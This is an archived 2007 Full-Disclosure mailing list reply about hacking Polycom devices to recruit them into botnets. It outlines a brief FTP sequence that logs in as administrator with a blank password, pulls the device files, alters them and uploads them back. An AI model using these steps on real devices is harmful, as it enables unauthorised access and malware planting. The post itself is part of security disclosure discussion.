[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Polycom hacking

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: Re: [Full-disclosure] Polycom hacking
From: Paul Schmehl <pauls@xxxxxxxxxxxx>
Date: Fri, 29 Jun 2007 09:25:21 -0500

--On Thursday, June 28, 2007 22:25:08 -0400 Peter Dawson<slash.pd@xxxxxxxxx> wrote:

interesting concept.. harvesting a polycom device for  Botnet's.

hmmmmmmmmm..  the key would be how the heck to get the stealthware on
such a device ??

That's easy.

ftp target.domain.tld
user administrator
pass (blank)
mget *
alter files to suit
mput *

--
Paul Schmehl (pauls@xxxxxxxxxxxx)
Senior Information Security Analyst
The University of Texas at Dallas
http://www.utdallas.edu/ir/security/

Attachment: p7semyupHJWEp.p7s
Description: S/MIME cryptographic signature

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

References:
- Re: [Full-disclosure] Polycom hacking
  - From: Paul Schmehl
- Re: [Full-disclosure] Polycom hacking
  - From: Peter Dawson

Prev by Date: [Full-disclosure] XSS in CIA
Next by Date: [Full-disclosure] [SECURITY] [DSA 1325-1] New evolution packages fix arbitrary code execution
Previous by thread: Re: [Full-disclosure] Polycom hacking
Next by thread: [Full-disclosure] iDefense Security Advisory 06.26.07: Multiple Vendor Kerberos kadmind Rename Principal Buffer Overflow Vulnerability
Index(es):
- Date
- Thread